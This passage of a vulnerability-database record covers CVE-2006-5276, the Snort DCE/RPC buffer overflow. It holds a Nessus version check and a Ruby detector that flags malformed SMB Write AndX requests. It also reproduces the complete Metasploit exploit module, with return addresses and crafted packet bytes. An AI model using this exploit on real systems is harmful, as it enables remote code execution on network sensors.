\nImpact :\n\n A remote attacker could send specially crafted fragmented SMB or\n DCE/RPC packets, without the need to finish the TCP handshake, that\n would trigger a stack-based buffer overflow while being reassembled.\n This could lead to the execution of arbitrary code with the permissions\n of the user running the Snort preprocessor.\n \nWorkaround :\n\n Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc'\n section in /etc/snort/snort.conf .", "edition": 25, "published": "2007-03-02T00:00:00", "title": "GLSA-200703-01 : Snort: Remote execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-5276"], "modified": "2007-03-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:snort"], "id": "GENTOO_GLSA-200703-01.NASL", "href": "https://www.tenable.com/plugins/nessus/24749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200703-01.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(24749);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-5276\");\n script_xref(name:\"GLSA\", value:\"200703-01\");\n\n script_name(english:\"GLSA-200703-01 : Snort: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200703-01\n(Snort: Remote execution of arbitrary code)\n\n The Snort DCE/RPC preprocessor does not properly reassemble certain\n types of fragmented SMB and DCE/RPC packets.\n \nImpact :\n\n A remote attacker could send specially crafted fragmented SMB or\n DCE/RPC packets, without the need to finish the TCP handshake, that\n would trigger a stack-based buffer overflow while being reassembled.\n This could lead to the execution of arbitrary code with the permissions\n of the user running the Snort preprocessor.\n \nWorkaround :\n\n Disable the DCE/RPC processor by commenting the 'preprocessor dcerpc'\n section in /etc/snort/snort.conf .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200703-01\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Snort users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-analyzer/snort-2.6.1.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", 
value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Snort 2 DCE/RPC Preprocessor Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:snort\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/02/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/03/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-analyzer/snort\", unaffected:make_list(\"ge 2.6.1.3\"), vulnerable:make_list(\"lt 2.6.1.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Snort\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-19T23:16:48", "description": "This module allows remote attackers to execute arbitrary code by exploiting the Snort service via crafted SMB traffic. The vulnerability is due to a boundary error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests, which may result in a stack-based buffer overflow with a specially crafted packet sent on a network that is monitored by Snort. Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6. Any host on the Snort network may be used as the remote host. The remote host does not need to be running the SMB service for the exploit to be successful.\n", "published": "2012-06-05T11:14:40", "type": "metasploit", "title": "Snort 2 DCE/RPC Preprocessor Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-5276"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/IDS/SNORT_DCE_RPC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Capture\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Snort 2 DCE/RPC Preprocessor Buffer Overflow',\n 'Description' => %q{\n This module allows remote attackers to execute arbitrary code by exploiting the\n Snort service via crafted SMB traffic. The vulnerability is due to a boundary\n error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\n which may result in a stack-based buffer overflow with a specially crafted packet\n sent on a network that is monitored by Snort.\n\n Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\n\n Any host on the Snort network may be used as the remote host. The remote host does not\n need to be running the SMB service for the exploit to be successful.\n },\n 'Author' =>\n [\n 'Neel Mehta', #Original discovery (IBM X-Force)\n 'Trirat Puttaraksa', #POC\n 'Carsten Maartmann-Moe <carsten[at]carmaa.com>', #Metasploit win\n '0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'OSVDB', '32094' ],\n [ 'CVE', '2006-5276' ],\n [ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],\n [ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],\n [ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 390,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true,\n },\n 'Platform' => %w{ win linux },\n 'Targets' =>\n [\n [\n 'Windows Universal',\n {\n 'Platform' => 'win',\n 'Ret' => 0x00407c01, # JMP ESP snort.exe\n 'Offset' => 289, # The number of bytes before overwrite\n 'Padding' => 0\n }\n ],\n [\n 'Redhat 8',\n {\n 'Platform' => 'linux',\n 'Ret' => 0xbffff110,\n 'Offset' => 317,\n 'Padding' => 28\n }\n ]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Feb 19 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(139),\n OptAddress.new('RHOST', [ true, 'A host on the Snort-monitored network' ]),\n OptAddress.new('SHOST', [ false, 'The (potentially spoofed) source address'])\n ])\n\n deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')\n 
end\n\n def exploit\n open_pcap\n\n shost = datastore['SHOST'] || Rex::Socket.source_address(rhost)\n\n p = buildpacket(shost, rhost, rport.to_i)\n\n print_status(\"#{rhost}:#{rport} Sending crafted SMB packet from #{shost}...\")\n\n return unless capture_sendto(p, rhost)\n\n handler\n end\n\n def buildpacket(shost, rhost, rport)\n p = PacketFu::TCPPacket.new\n p.ip_saddr = shost\n p.ip_daddr = rhost\n p.tcp_dport = rport\n p.tcp_flags.psh = 1\n p.tcp_flags.ack = 1\n\n # SMB packet borrowed from https://www.exploit-db.com/exploits/3362\n\n # NetBIOS Session Service, value is the number of bytes in the TCP segment,\n # must be greater than the total size of the payload. Statically set.\n header = \"\\x00\\x00\\xde\\xad\"\n\n # SMB Header\n header << \"\\xff\\x53\\x4d\\x42\\x75\\x00\\x00\\x00\\x00\\x18\\x07\\xc8\\x00\\x00\"\n header << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xfe\"\n header << \"\\x00\\x08\\x30\\x00\"\n\n # Tree Connect AndX Request\n header << \"\\x04\\xa2\\x00\\x52\\x00\\x08\\x00\\x01\\x00\\x27\\x00\\x00\"\n header << \"\\x5c\\x00\\x5c\\x00\\x49\\x00\\x4e\\x00\\x53\\x00\\x2d\\x00\\x4b\\x00\\x49\\x00\"\n header << \"\\x52\\x00\\x41\\x00\\x5c\\x00\\x49\\x00\\x50\\x00\\x43\\x00\\x24\\x00\\x00\\x00\"\n header << \"\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\"\n\n # NT Create AndX Request\n header << \"\\x18\\x2f\\x00\\x96\\x00\\x00\\x0e\\x00\\x16\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n header << \"\\x9f\\x01\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n header << \"\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x40\\x00\\x40\\x00\\x02\\x00\\x00\\x00\"\n header << \"\\x01\\x11\\x00\\x00\\x5c\\x00\\x73\\x00\\x72\\x00\\x76\\x00\\x73\\x00\\x76\\x00\"\n header << \"\\x63\\x00\\x00\\x00\"\n\n # Write AndX Request #1\n header << \"\\x0e\\x2f\\x00\\xfe\\x00\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n header << \"\\x00\\x48\\x00\\x00\\x00\\x48\\x00\\xb6\\x00\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n header << 
\"\\x05\\x00\\x0b\\x03\\x10\\x00\\x00\\x00\\xff\\x01\\x00\\x00\\x01\\x00\\x00\\x00\"\n header << \"\\xb8\\x10\\xb8\\x10\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x01\\x00\"\n header << \"\\xc8\\x4f\\x32\\x4b\\x70\\x16\\xd3\\x01\\x12\\x78\\x5a\\x47\\xbf\\x6e\\xe1\\x88\"\n header << \"\\x03\\x00\\x00\\x00\\x04\\x5d\\x88\\x8a\\xeb\\x1c\\xc9\\x11\\x9f\\xe8\\x08\\x00\"\n header << \"\\x2b\\x10\\x48\\x60\\x02\\x00\\x00\\x00\"\n\n # Write AndX Request #2\n header << \"\\x0e\\xff\\x00\\xde\\xde\\x00\\x40\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x80\"\n header << \"\\x00\\x48\\x00\\x00\\x00\\xff\\x01\"\n tail = \"\\x00\\x00\\x00\\x00\\x49\\x00\\xee\"\n\n # Return address\n eip = [target['Ret']].pack('V')\n\n # Sploit\n sploit = make_nops(10)\n sploit << payload.encoded\n\n # Padding (to pass size check)\n sploit << make_nops(1)\n\n # The size to be included in Write AndX Request #2, including sploit payload\n requestsize = [(sploit.size() + target['Offset'])].pack('v')\n\n # Assemble the parts into one package\n p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit\n\n p.recalc\n\n p\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/ids/snort_dce_rpc.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
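The Metasploit module above builds one TCP segment that chains Tree Connect AndX, NT Create AndX and two Write AndX requests, and the trigger is the second Write AndX: its DataLength field says 0x1ff (511) bytes while its ByteCount says 73 and its DataOffset points at the last byte of the segment. The following Ruby script is an added example, not code from Snort, the Nessus plugin or the Metasploit module: it rebuilds that segment from the byte strings in the module (with a 4-byte placeholder for the return address and 401 filler bytes standing in for the 10 NOPs, the 390-byte payload and the one padding byte, so DataOffset comes out as 401 + 289 = 690 exactly as the module computes it for the Windows target), walks the AndX chain by following each AndXOffset, and applies the consistency check a reassembler has to make before copying Write AndX data: the declared DataLength must fit inside the request's own ByteCount and inside what is left of the segment after DataOffset. The command table, the `bytes` helper and the function names are this example's own.

```ruby
# Added example: walk an SMB1 AndX chain in one TCP segment and check each
# Write AndX request's declared DataLength against the bytes actually present.
# Not part of Snort, the Nessus plugin or the Metasploit module.

def bytes(*hex_rows)
  [hex_rows.join.delete(" \n")].pack('H*')
end

SMB_HEADER_LEN = 32
SMB_MAGIC      = bytes('ff 53 4d 42')
WRITE_ANDX     = 0x2f
NO_ANDX        = 0xff
# SMB1 commands whose parameter block starts with AndXCommand/AndXReserved/AndXOffset
ANDX_COMMANDS  = [0x24, 0x2d, 0x2e, 0x2f, 0x73, 0x74, 0x75, 0xa2].freeze
SMB_CMD_NAMES  = { 0x75 => 'Tree Connect AndX', 0xa2 => 'NT Create AndX',
                   0x2f => 'Write AndX' }.freeze

# Write AndX parameter layout (byte offsets into the WordCount*2 parameter bytes):
# AndXCommand 0, AndXOffset 2, FID 4, Offset 6, Timeout 10, WriteMode 14,
# Remaining 16, DataLengthHigh 18, DataLength 20, DataOffset 22 (relative to
# the start of the SMB header), OffsetHigh 24.
def parse_andx_chain(segment)
  smb = segment.byteslice(4, segment.bytesize - 4) # drop the NetBIOS session header
  raise ArgumentError, 'not an SMB1 message' unless smb.byteslice(0, 4) == SMB_MAGIC

  chain = []
  cmd = smb.getbyte(4)
  off = SMB_HEADER_LEN
  loop do
    word_count = smb.getbyte(off)
    break if word_count.nil?
    params_end = off + 1 + word_count * 2
    break if params_end + 2 > smb.bytesize
    params     = smb.byteslice(off + 1, word_count * 2)
    byte_count = smb.byteslice(params_end, 2).unpack1('v')
    entry = { cmd: cmd, name: SMB_CMD_NAMES.fetch(cmd, format('0x%02x', cmd)),
              offset: off, word_count: word_count, byte_count: byte_count }
    if cmd == WRITE_ANDX && word_count >= 12
      data_length = params.byteslice(20, 2).unpack1('v')
      data_offset = params.byteslice(22, 2).unpack1('v')
      available   = smb.bytesize - data_offset # bytes left after DataOffset (may be negative)
      entry[:data_length] = data_length
      entry[:data_offset] = data_offset
      entry[:consistent]  = data_length <= byte_count && data_length <= available
    end
    chain << entry

    break unless ANDX_COMMANDS.include?(cmd) && word_count >= 2
    next_cmd = params.getbyte(0)
    next_off = params.byteslice(2, 2).unpack1('v')
    break if next_cmd == NO_ANDX
    break if next_off <= off || next_off >= smb.bytesize # refuse to walk backwards or off the end
    cmd, off = next_cmd, next_off
  end
  chain
end

# Write AndX requests whose declared DataLength cannot be backed by real bytes.
def suspicious_writes(segment)
  parse_andx_chain(segment).select { |e| e[:cmd] == WRITE_ANDX && !e[:consistent] }
end

# Constructed sample: the module's byte strings, with 'BBBB' in place of the
# return address and 401 'A's in place of NOPs + payload + padding.
SAMPLE_SEGMENT = bytes(
  '00 00 de ad',                                       # NetBIOS session service header
  'ff 53 4d 42 75 00 00 00 00 18 07 c8 00 00',         # SMB header, command 0x75
  '00 00 00 00 00 00 00 00 00 00 00 00 ff fe',
  '00 08 30 00',
  '04 a2 00 52 00 08 00 01 00 27 00 00',               # Tree Connect AndX -> 0xa2 at 0x52
  '5c 00 5c 00 49 00 4e 00 53 00 2d 00 4b 00 49 00',
  '52 00 41 00 5c 00 49 00 50 00 43 00 24 00 00 00',
  '3f 3f 3f 3f 3f 00',
  '18 2f 00 96 00 00 0e 00 16 00 00 00 00 00 00 00',   # NT Create AndX -> 0x2f at 0x96
  '9f 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00',
  '03 00 00 00 01 00 00 00 40 00 40 00 02 00 00 00',
  '01 11 00 00 5c 00 73 00 72 00 76 00 73 00 76 00',
  '63 00 00 00',
  '0e 2f 00 fe 00 00 40 00 00 00 00 ff ff ff ff 80',   # Write AndX #1 -> 0x2f at 0xfe
  '00 48 00 00 00 48 00 b6 00 00 00 00 00 49 00 ee',   # DataLength 0x48, DataOffset 0xb6
  '05 00 0b 03 10 00 00 00 ff 01 00 00 01 00 00 00',   # 72-byte DCE/RPC bind
  'b8 10 b8 10 00 00 00 00 01 00 00 00 00 00 01 00',
  'c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88',
  '03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00',
  '2b 10 48 60 02 00 00 00',
  '0e ff 00 de de 00 40 00 00 00 00 ff ff ff ff 80',   # Write AndX #2, no further AndX
  '00 48 00 00 00 ff 01'                               # DataLength 0x1ff
) + [401 + 289].pack('v') +                            # DataOffset = sploit.size + Offset
  bytes('00 00 00 00 49 00 ee') + ('B' * 4).b + ('A' * 401).b

if $PROGRAM_NAME == __FILE__
  parse_andx_chain(SAMPLE_SEGMENT).each do |e|
    line = format('%-18s at SMB offset %3d, WordCount %2d, ByteCount %3d',
                  e[:name], e[:offset], e[:word_count], e[:byte_count])
    if e.key?(:data_length)
      line << format(', DataLength %d at DataOffset %d (%s)', e[:data_length],
                     e[:data_offset], e[:consistent] ? 'ok' : 'INCONSISTENT')
    end
    puts line
  end
end
```

Run it with `ruby` and the first Write AndX (DataLength 72, DataOffset 182) passes while the second (DataLength 511 against a ByteCount of 73 and one remaining byte) is flagged. The check is a plain consistency test on the fields a reassembler reads; it does not claim to reproduce the exact comparison Snort's preprocessor got wrong, only the one that a correct implementation must make before copying chained Write AndX data into a fixed-size buffer.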